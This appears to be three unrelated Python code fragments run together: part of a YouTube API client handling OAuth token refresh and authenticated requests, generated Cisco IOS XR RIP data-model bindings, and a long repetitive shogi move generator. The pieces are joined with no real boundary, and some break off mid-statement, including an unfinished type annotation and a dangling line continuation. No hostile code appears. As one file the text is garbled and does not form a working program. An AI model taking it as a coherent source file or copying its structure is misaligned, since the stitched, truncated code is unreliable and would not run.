self, refresh_token: Optional[str] = None, return_json: bool = False
) -> Union[dict, AccessToken]:
"""
Refresh token by api return refresh token.
Args:
refresh_token (str)
The refresh token which the api returns.
return_json (bool, optional):
If True JSON data will be returned, instead of pyyoutube.AccessToken
Return:
Retrieved new access token's info, pyyoutube.AccessToken instance.
"""
refresh_token = refresh_token if refresh_token else self._refresh_token
if refresh_token is None:
raise PyYouTubeException(
ErrorMessage(
status_code=ErrorCode.MISSING_PARAMS,
message=f"Must provide the refresh token or api has been authorized.",
)
)
oauth_session = OAuth2Session(client_id=self._client_id)
auth = HTTPBasicAuth(self._client_id, self._client_secret)
new_token = oauth_session.refresh_token(
self.EXCHANGE_ACCESS_TOKEN_URL,
refresh_token=refresh_token,
auth=auth,
)
self._access_token = oauth_session.access_token
if return_json:
return new_token
else:
return AccessToken.from_dict(new_token)
@staticmethod
def _parse_response(response: Response) -> dict:
"""
Parse response data and check whether errors exists.
Args:
response (Response)
The response which the request return.
Return:
response's data
"""
data = response.json()
if "error" in data:
raise PyYouTubeException(response)
return data
@staticmethod
def _parse_data(data: Optional[dict]) -> Union[dict, list]:
"""
Parse resp data.
Args:
data (dict)
The response data by response.json()
Return:
response's items
"""
items = data["items"]
return items
def _request(
self, resource, method=None, args=None, post_args=None, enforce_auth=True
) -> Response:
"""
Main request sender.
Args:
resource(str)
Resource field is which type data you want to retrieve.
Such as channels,videos and so on.
method(str, optional)
The method this request to send request.
Default is 'GET'
args(dict, optional)
The url params for this request.
post_args(dict, optional)
The Post params for this request.
enforce_auth(bool, optional)
Whether use google credentials
Returns:
response
"""
if method is None:
method = "GET"
if args is None:
args = dict()
if post_args is not None:
method = "POST"
key = None
access_token = None
if self._api_key is not None:
key = "key"
access_token = self._api_key
if self._access_token is not None:
key = "access_token"
access_token = self._access_token
if access_token is None and enforce_auth:
raise PyYouTubeException(
ErrorMessage(
status_code=ErrorCode.MISSING_PARAMS,
message="You must provide your credentials.",
)
)
if enforce_auth:
if method == "POST" and key not in post_args:
post_args[key] = access_token
elif method == "GET" and key not in args:
args[key] = access_token
try:
response = self.session.request(
method=method,
url=self.BASE_URL + resource,
timeout=self._timeout,
params=args,
data=post_args,
proxies=self.proxies,
)
except requests.HTTPError as e:
raise PyYouTubeException(
ErrorMessage(status_code=ErrorCode.HTTP_ERROR, message=e.args[0])
)
else:
return response
def get_profile(
self, access_token: Optional[str] = None, return_json: Optional[bool] = False
) -> Union[dict, UserProfile]:
"""
Get token user info.
Args:
access_token(str, optional)
user access token. If not provide, use api instance access token
return_json(bool, optional)
The return data type. If you set True JSON data will be returned.
False will return pyyoutube.UserProfile
Returns:
The data for you given access token's user info.
"""
if access_token is None:
access_token = self._access_token
if access_token is None:
raise PyYouTubeException(
ErrorMessage(
status_code=ErrorCode.MISSING_PARAMS,
message=f"Must provide the access token or api has been authorized.",
)
)
try:
response = self.session.get(
self.USER_INFO_URL,
params={"access_token": access_token},
timeout=self._timeout,
proxies=self.proxies,
)
except requests.HTTPError as e:
raise PyYouTubeException(
ErrorMessage(status_code=ErrorCode.HTTP_ERROR, message=e.args[0])
)
data = self._parse_response(response)
if return_json:
return data
else:
return UserProfile.from_dict(data)
def paged_by_page_token(
self,
resource: str,
args: dict,
count: Optional[int] = None,
):
"""
Response paged by response's page token. If not provide response token
Args:
resource (str):
The resource string need to retrieve data.
args (dict)
The args for api.
count (int, optional):
The count for result items you want to get.
If provide this with None, will retrieve all items.
Note:
The all items maybe too much. Notice your app's cost.
Returns:
Data api origin response.
"""
res_data: Optional[dict] | |
destination_address
IP Address of this interface
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Prefix length of the IP address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric_cost
Cost added to routes through this interface
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: split_horizon
Split horizon enabled indicator
**type**\: bool
**config**\: False
.. attribute:: poison_horizon
Poisoned reverse enabled indicator
**type**\: bool
**config**\: False
.. attribute:: triggered_rip
Triggered RIP enabled indicator
**type**\: bool
**config**\: False
.. attribute:: neighbor_address
Interface's triggered RIP neighbor
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: oom_flags
Out\-of\-memory status flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: join_status
Multicast group join status
**type**\: bool
**config**\: False
.. attribute:: lpts_state
LPTSState
**type**\: bool
**config**\: False
.. attribute:: auth_mode
Authentication Mode
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_keychain
Authentication Keychain Name
**type**\: str
**config**\: False
.. attribute:: send_auth_key_exists
Authentication send key exists
**type**\: bool
**config**\: False
.. attribute:: auth_key_md5
Authentication key programmed with MD5 algorithm
**type**\: bool
**config**\: False
.. attribute:: auth_key_send_id
Current active Send Authentication Key Id
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: total_pkt_recvd
Total packets received
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_wrong_kc
Packets dropped due to wrong keychain configured
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_no_auth
Packets dropped due to missing authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_drop_invalid_auth
Packets dropped due to invalid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: pkt_accepted_valid_auth
Packets accepted with valid authentication data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rip_summary
User defined summary addresses
**type**\: list of :py:class:`RipSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Interfaces.Interface.RipSummary>`
**config**\: False
.. attribute:: rip_peer
Neighbors on this interface
**type**\: list of :py:class:`RipPeer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Interfaces.Interface.RipPeer>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.DefaultVrf.Interfaces.Interface, self).__init__()
self.yang_name = "interface"
self.yang_parent_name = "interfaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['interface_name']
self._child_classes = OrderedDict([("rip-summary", ("rip_summary", Rip.DefaultVrf.Interfaces.Interface.RipSummary)), ("rip-peer", ("rip_peer", Rip.DefaultVrf.Interfaces.Interface.RipPeer))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('interface', (YLeaf(YType.str, 'interface'), ['str'])),
('if_handle', (YLeaf(YType.str, 'if-handle'), ['str'])),
('rip_enabled', (YLeaf(YType.boolean, 'rip-enabled'), ['bool'])),
('is_passive_interface', (YLeaf(YType.boolean, 'is-passive-interface'), ['bool'])),
('multicast_address', (YLeaf(YType.boolean, 'multicast-address'), ['bool'])),
('accept_metric', (YLeaf(YType.boolean, 'accept-metric'), ['bool'])),
('send_version', (YLeaf(YType.uint32, 'send-version'), ['int'])),
('receive_version', (YLeaf(YType.uint32, 'receive-version'), ['int'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper', 'InterfaceState', '')])),
('destination_address', (YLeaf(YType.str, 'destination-address'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('metric_cost', (YLeaf(YType.uint32, 'metric-cost'), ['int'])),
('split_horizon', (YLeaf(YType.boolean, 'split-horizon'), ['bool'])),
('poison_horizon', (YLeaf(YType.boolean, 'poison-horizon'), ['bool'])),
('triggered_rip', (YLeaf(YType.boolean, 'triggered-rip'), ['bool'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str'])),
('oom_flags', (YLeaf(YType.uint32, 'oom-flags'), ['int'])),
('join_status', (YLeaf(YType.boolean, 'join-status'), ['bool'])),
('lpts_state', (YLeaf(YType.boolean, 'lpts-state'), ['bool'])),
('auth_mode', (YLeaf(YType.uint32, 'auth-mode'), ['int'])),
('auth_keychain', (YLeaf(YType.str, 'auth-keychain'), ['str'])),
('send_auth_key_exists', (YLeaf(YType.boolean, 'send-auth-key-exists'), ['bool'])),
('auth_key_md5', (YLeaf(YType.boolean, 'auth-key-md5'), ['bool'])),
('auth_key_send_id', (YLeaf(YType.uint64, 'auth-key-send-id'), ['int'])),
('total_pkt_recvd', (YLeaf(YType.uint32, 'total-pkt-recvd'), ['int'])),
('pkt_drop_wrong_kc', (YLeaf(YType.uint32, 'pkt-drop-wrong-kc'), ['int'])),
('pkt_drop_no_auth', (YLeaf(YType.uint32, 'pkt-drop-no-auth'), ['int'])),
('pkt_drop_invalid_auth', (YLeaf(YType.uint32, 'pkt-drop-invalid-auth'), ['int'])),
('pkt_accepted_valid_auth', (YLeaf(YType.uint32, 'pkt-accepted-valid-auth'), ['int'])),
])
self.interface_name = None
self.interface = None
self.if_handle = None
self.rip_enabled = None
self.is_passive_interface = None
self.multicast_address = None
self.accept_metric = None
self.send_version = None
self.receive_version = None
self.state = None
self.destination_address = None
self.prefix_length = None
self.metric_cost = None
self.split_horizon = None
self.poison_horizon = None
self.triggered_rip = None
self.neighbor_address = None
self.oom_flags = None
self.join_status = None
self.lpts_state = None
self.auth_mode = None
self.auth_keychain = None
self.send_auth_key_exists = None
self.auth_key_md5 = None
self.auth_key_send_id = None
self.total_pkt_recvd = None
self.pkt_drop_wrong_kc = None
self.pkt_drop_no_auth = None
self.pkt_drop_invalid_auth = None
self.pkt_accepted_valid_auth = None
self.rip_summary = YList(self)
self.rip_peer = YList(self)
self._segment_path = lambda: "interface" + "[interface-name='" + str(self.interface_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-rip-oper:rip/default-vrf/interfaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface, ['interface_name', 'interface', 'if_handle', 'rip_enabled', 'is_passive_interface', 'multicast_address', 'accept_metric', 'send_version', 'receive_version', 'state', 'destination_address', 'prefix_length', 'metric_cost', 'split_horizon', 'poison_horizon', 'triggered_rip', 'neighbor_address', 'oom_flags', 'join_status', 'lpts_state', 'auth_mode', 'auth_keychain', 'send_auth_key_exists', 'auth_key_md5', 'auth_key_send_id', 'total_pkt_recvd', 'pkt_drop_wrong_kc', 'pkt_drop_no_auth', 'pkt_drop_invalid_auth', 'pkt_accepted_valid_auth'], name, value)
class RipSummary(_Entity_):
"""
User defined summary addresses
.. attribute:: prefix
Summary address prefix
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: prefix_length
Summary address prefix length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: next_hop_address
Summary address next hop
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: metric
Summary metric
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.DefaultVrf.Interfaces.Interface.RipSummary, self).__init__()
self.yang_name = "rip-summary"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('next_hop_address', (YLeaf(YType.str, 'next-hop-address'), ['str'])),
('metric', (YLeaf(YType.int32, 'metric'), ['int'])),
])
self.prefix = None
self.prefix_length = None
self.next_hop_address = None
self.metric = None
self._segment_path = lambda: "rip-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface.RipSummary, ['prefix', 'prefix_length', 'next_hop_address', 'metric'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface.RipSummary']['meta_info']
class RipPeer(_Entity_):
"""
Neighbors on this interface
.. attribute:: peer_uptime
Uptime of this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: peer_address
IP Address of this peer
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: peer_version
RIP version for this peer
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: discarded_peer_packets
Discarded packets from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: discarded_peer_routes
Discarded routes from this peer
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.DefaultVrf.Interfaces.Interface.RipPeer, self).__init__()
self.yang_name = "rip-peer"
self.yang_parent_name = "interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('peer_uptime', (YLeaf(YType.uint32, 'peer-uptime'), ['int'])),
('peer_address', (YLeaf(YType.str, 'peer-address'), ['str'])),
('peer_version', (YLeaf(YType.uint8, 'peer-version'), ['int'])),
('discarded_peer_packets', (YLeaf(YType.uint32, 'discarded-peer-packets'), ['int'])),
('discarded_peer_routes', (YLeaf(YType.uint32, 'discarded-peer-routes'), ['int'])),
])
self.peer_uptime = None
self.peer_address = None
self.peer_version = None
self.discarded_peer_packets = None
self.discarded_peer_routes = None
self._segment_path = lambda: "rip-peer"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.DefaultVrf.Interfaces.Interface.RipPeer, ['peer_uptime', 'peer_address', 'peer_version', 'discarded_peer_packets', 'discarded_peer_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface.RipPeer']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.DefaultVrf.Interfaces.Interface']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ip_rip_oper as meta
return meta._meta_table['Rip.DefaultVrf.Interfaces']['meta_info']
class Global(_Entity_):
"""
Global Information
.. attribute:: vrf_summary
VRF summary data
**type**\: :py:class:`VrfSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Global.VrfSummary>`
**config**\: False
.. attribute:: interface_summary
List of Interfaces configured
**type**\: list of :py:class:`InterfaceSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ip_rip_oper.Rip.DefaultVrf.Global.InterfaceSummary>`
**config**\: False
"""
_prefix = 'ip-rip-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Rip.DefaultVrf.Global, self).__init__()
self.yang_name = "global"
self.yang_parent_name = "default-vrf"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("vrf-summary", ("vrf_summary", Rip.DefaultVrf.Global.VrfSummary)), ("interface-summary", ("interface_summary", Rip.DefaultVrf.Global.InterfaceSummary))])
self._leafs = OrderedDict()
self.vrf_summary = Rip.DefaultVrf.Global.VrfSummary()
self.vrf_summary.parent = self
self._children_name_map["vrf_summary"] = "vrf-summary"
self.interface_summary = YList(self)
self._segment_path = lambda: "global"
self._absolute_path = lambda: "Cisco-IOS-XR-ip-rip-oper:rip/default-vrf/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Rip.DefaultVrf.Global, [], name, value)
class VrfSummary(_Entity_):
"""
VRF summary data
.. attribute:: vrf_name
VRF Name
**type**\: str
**config**\: False
.. attribute:: active
VRF Active indicator
**type**\: bool
**config**\: False
.. attribute:: oom_flags
Current OOM flags
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: route_count
Number of routes allocated
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: path_count
Number of paths allocated
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_timer
Update timer
| |
== 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w3e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e=='':
moves = '9e3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w2e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e+board.s3e=='':
moves = '9e2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w9e)and Wboard.w1e==''\
and board.s8e+board.s7e+board.s6e+board.s5e+board.s4e+board.s3e+board.s2e=='':
moves = '9e1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w7c==''\
and board.s8d=='':
moves = '9e7c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w6b==''\
and board.s8d+board.s7c=='':
moves = '9e6b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w9e)and Wboard.w5a==''\
and board.s8d+board.s7c+board.s6b=='':
moves = '9e5a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w5i==''\
and board.s6h+board.s7g+board.s8f=='':
moves = '9e5i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w6h==''\
and board.s7g+board.s8f=='':
moves = '9e6h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b',Wboard.w9e)and Wboard.w7g==''\
and board.s8f=='':
moves = '9e7g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w9e)and Wboard.w5i==''\
and board.s6h+board.s7g+board.s8f=='':
moves = '9e5i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w9e)and Wboard.w6h==''\
and board.s7g+board.s8f=='':
moves = '9e6h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b',Wboard.w9e)and Wboard.w7g==''\
and board.s8f=='':
moves = '9e7g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w1d !='':
if re.match(r'[plsgrk+]', Wboard.w1d)and Wboard.w1e=='':
moves = '1d1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w1d)and Wboard.w2e=='':
moves = '1d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w1d)and Wboard.w2d=='':
moves = '1d2d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w1d)and Wboard.w1c=='':
moves = '1d1c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w1d)and Wboard.w2c=='':
moves = '1d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w1d)and Wboard.w2f=='':
moves = '1d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w1d)and Wboard.w1i==''\
and board.s1h+board.s1g+board.s1f+board.s1e=='':
moves = '1d1i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1i==''\
and board.s1h+board.s1g+board.s1f+board.s1e=='':
moves = '1d1i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w1d)and Wboard.w1h==''\
and board.s1g+board.s1f+board.s1e=='':
moves = '1d1h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1h==''\
and board.s1g+board.s1f+board.s1e=='':
moves = '1d1h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|l', Wboard.w1d)and Wboard.w1g==''\
and board.s1f+board.s1e=='':
moves = '1d1g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w1d)and Wboard.w1g==''\
and board.s1f+board.s1e=='':
moves = '1d1g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r|l', Wboard.w1d)and Wboard.w1f==''\
and board.s1e=='':
moves = '1d1f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w1b==''\
and board.s1c=='':
moves = '1d1b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w1a==''\
and board.s1c+board.s1b=='':
moves = '1d1a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w3d==''\
and board.s2d=='':
moves = '1d3d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w4d==''\
and board.s2d+board.s3d=='':
moves = '1d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w5d==''\
and board.s2d+board.s3d+board.s4d=='':
moves = '1d5d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w6d==''\
and board.s2d+board.s3d+board.s4d+board.s5d=='':
moves = '1d6d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w7d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d=='':
moves = '1d7d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w8d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d+board.s7d=='':
moves = '1d8d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w1d)and Wboard.w9d==''\
and board.s2d+board.s3d+board.s4d+board.s5d+board.s6d+board.s7d+board.s8d=='':
moves = '1d9d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+b|b', Wboard.w1d)and Wboard.w3f==''\
and board.s2e=='':
moves = '1d3f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w4g==''\
and board.s2e+board.s3f=='':
moves = '1d4g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w5h==''\
and board.s2e+board.s3f+board.s4g=='':
moves = '1d5h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w6i==''\
and board.s2e+board.s3f+board.s4g+board.s5h=='':
moves = '1d6i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w4a==''\
and board.s3b+board.s2c=='':
moves = '1d4a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+b', Wboard.w1d)and Wboard.w3b==''\
and board.s2c=='':
moves = '1d3b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w4g==''\
and board.s2e+board.s3f=='':
moves = '1d4g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w5h==''\
and board.s2e+board.s3f+board.s4g=='':
moves = '1d5h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('b', Wboard.w1d)and Wboard.w6i==''\
and board.s2e+board.s3f+board.s4g+board.s5h=='':
moves = '1d6i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if Wboard.w2d !='':
if re.match(r'[plsgrk+]', Wboard.w2d)and Wboard.w2e=='':
moves = '2d2e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w2d)and Wboard.w1e=='':
moves = '2d1e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[sgbk+]', Wboard.w2d)and Wboard.w3e=='':
moves = '2d3e'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w1d=='':
moves = '2d1d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w3d=='':
moves = '2d3d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'[grk+]', Wboard.w2d)and Wboard.w2c=='':
moves = '2d2c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w2d)and Wboard.w1c=='':
moves = '2d1c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|\+b|b|s|k',Wboard.w2d)and Wboard.w3c=='':
moves = '2d3c'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w2d)and Wboard.w1f=='':
moves = '2d1f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('n', Wboard.w2d)and Wboard.w3f=='':
moves = '2d3f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w2d)and Wboard.w2i==''\
and board.s2h+board.s2g+board.s2f+board.s2e=='':
moves = '2d2i'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2i==''\
and board.s2h+board.s2g+board.s2f+board.s2e=='':
moves = '2d2i+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match('\+r', Wboard.w2d)and Wboard.w2h==''\
and board.s2g+board.s2f+board.s2e=='':
moves = '2d2h'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2h==''\
and board.s2g+board.s2f+board.s2e=='':
moves = '2d2h+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|l', Wboard.w2d)and Wboard.w2g==''\
and board.s2f+board.s2e=='':
moves = '2d2g'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'r|l', Wboard.w2d)and Wboard.w2g==''\
and board.s2f+board.s2e=='':
moves = '2d2g+'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r|l', Wboard.w2d)and Wboard.w2f==''\
and board.s2e=='':
moves = '2d2f'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w2b==''\
and board.s2c=='':
moves = '2d2b'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w2a==''\
and board.s2c+board.s2b=='':
moves = '2d2a'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w4d==''\
and board.s3d=='':
moves = '2d4d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w5d==''\
and board.s3d+board.s4d=='':
moves = '2d5d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w6d==''\
and board.s3d+board.s4d+board.s5d=='':
moves = '2d6d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w7d==''\
and board.s3d+board.s4d+board.s5d+board.s6d=='':
moves = '2d7d'
kaihimore(moves)
if oute.oute == 0:
depth1.append(moves)
if re.match(r'\+r|r', Wboard.w2d)and Wboard.w8d==''\
